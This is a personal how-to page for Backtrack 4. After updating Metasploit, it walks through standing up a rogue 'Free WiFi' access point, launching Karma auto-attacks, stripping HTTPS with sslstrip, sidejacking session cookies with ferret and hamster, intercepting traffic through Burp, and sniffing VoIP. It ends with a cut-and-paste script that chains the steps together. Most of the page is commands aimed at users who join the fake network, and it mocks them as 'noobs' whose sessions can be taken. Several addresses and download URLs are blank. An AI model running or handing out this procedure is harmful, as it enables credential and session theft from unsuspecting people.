How-To: Backtrack 4 Guide

Get into Backtrack
Use my bt-customize script not BT's.

  1. apt-get update
  2. apt-get upgrade
  3. apt-get clean

VirtualBox guest Additions…not needed anymore with Defcon 18 BT Release

  1. cd /usr/src/linux
  2. make-kpkg kernel_headers
  3. cd ..
  4. dpkg -i linux-headers.blah.blah.deb
  5. Steal the from the VirtualBox server directory.
  6. ./

Update Metasploit this step is required.

$ sudo bash
cd /pentest/svn
rm -rf framework3
svn co framework3

cd /pentest/svn/framework3/external/pcaprub
ruby extconf.rb
make && make install

cd /pentest/svn
svn co lorcon2
cd lorcon2
./configure —prefix=/usr && make && make install
cd /pentest/svn/framework3/external/ruby-lorcon2
ruby extconf.rb
make && make install

The link it back to the original location
rm /pentest/exploits/framework3
ln -s /pentest/svn/framework3 /pentest/exploits/

To keep it all uptodate:
svn update /pentest/svn/framework3/

You need this too:
gem install activerecord sqlite3-ruby

To fire up an access point

airmon-ng start [wifi-interface]
This will create a monitor interface and tell you what it is. Mine is mon0, yours may be different. Use iwconfig to see it.
aireplay-ng —test [monitor-interface] (i.e mon0)

nano /etc/dhcp3/dhcpd.conf
default-lease-time 60;
max-lease-time 72;

ddns-update-style none;


log-facility local7;

subnet netmask {
option routers;
option domain-name-servers;

nano /etc/default/dhcp3-server
change the interface to "at0" (no not ethX or wlanX…)

to catch every probe request
airbase-ng -P -v
or to advertise a particular network
airbase-ng -P -C 30 -e "Free WiFi" [monitor-interface] (i.e. mon0) -v or -q
Now, when airbase fires up, it creates at0. This at0 is what you use for IP traffic, not wlanX, not ethX…
ifconfig at0 up netmask

You should now have a running access point. you can now do IP masquerading to serve the nets or do more fun.

get karma.rc

  1. wget

Metasploit auto attack framework:

  1. msfconsole -r karma.rc

You need this to keep their shit on your network and not reroute around you and give out net access:
echo 1 > /proc/sys/net/ipv4/ip_forward
### Don't do this shit, it fucks up DNS!!!!—-» iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o $wan -s -j MASQUERADE

Session Sidejacking HTTP/HTTPS:

Update your sslstrip

  1. wget
  2. tar zxvf sslstrip-0.7.tar.gz
  3. cd sslstrip-07
  4. python install
  5. cd ..
  6. rm -rf sslstrip-0.7*

Monitors HTTPS. fakes out a "lock" favicon in their browser, kill off old sessions and listen to port 10000 by default.
sslstrip -p -k -f
Reroute shit into sslstrip
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports 10000

Sniff session cookies
/pentest/sniffers/hamster/ferret -i at0 or the ethX of the out going interface

Monitor cookie eating

Setup your browser to proxy to and you'll see hamster's interface.
Click on noobs and then on the left you can see their sessions.

Burpsuite 1.3
First setup your firewall to transparently proxy 80 and 443 into Burp.

HTTPS Burp Proxy
($honey should be your WLAN interface, probably at0)
$ipt -t nat -A PREROUTING -i $honey -p tcp —dport 443 -j DNAT —to

HTTP Burp Proxy
ipt -t nat -A PREROUTING -i $honey -p tcp —dport 80 -j DNAT —to
( is the IP of the WLAN interface)
these lines below are only needed if you are running a NAT firewall.
$ipt -A INPUT -i $honey -p tcp —dport 8080 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8080 -j ACCEPT
$ipt -A INPUT -i $honey -p tcp —dport 8181 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8181 -j ACCEPT
$ipt -A INPUT -i $honey -p udp —dport 53 -j ACCEPT
$ipt -A OUTPUT -o $honey -p udp —sport 53 -j ACCEPT
$ipt -A INPUT -i $honey -j DROP
$ipt -A OUTPUT -o $honey -j DROP

Forward IP

  1. echo "1" > /proc/sys/net/ipv4/ip_forward

Masquarade out
$ipt -t nat -A POSTROUTING -o $wan -s -j MASQUERADE
Fire up Burp
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Proxy tab->Intercept tab->Turn Intercept off.
Proxy tab->Options tab->delete current listener port.
…then add 8181 and 8080.
…Uncheck listen on loopback port
…check support invisible proxying

Xplico 0.5.6
/etc/init.d/apache2 start
/etc/init.d/xplico start
Now surf to localhost:9876
**Remember, the Backtrack apache2 listens on port 80 and 9876. The NMS LAMPP webserver listens on port 81.
!!!!!!You must turn on LAMPP FIRST then apache2 as LAMPP bitches about another webserver running!!!!!!

Edit the /etc/silcd/silcd-primary-ip.conf for your IP you want to listen on.

  1. /etc/init.d/silcd start

Pidgin with Silcd
Fire up Pidgin
Add a new account
Basic tab —> enter your nick, ip of silcd server, password
Advanced tab —> enter ip of silcd server for connect server, check use perfect forward secrey and public key auth.
Hit Save
You should auto connect, it will ask for your password. If not, simply enable/re-enable your account to connect.
Then click Buddies —> Join a chat —> enter a room name to create and optional password for it.

Ucsniff VOIP sniffer
Will decompress most codecs etc…
ucsniff -i eth0 -M

Do it all script..cut and paste: (assumes WIFI on wlan0, WAN is on eth0 and online)

airmon-ng start wlan0
airbase-ng -P mon0 -v

In another terminal:

ifconfig at0 up netmask
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s -j MASQUERADE
/etc/init.d/dhcp3-server start
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 443 -j DNAT —to
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 80 -j DNAT —to
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License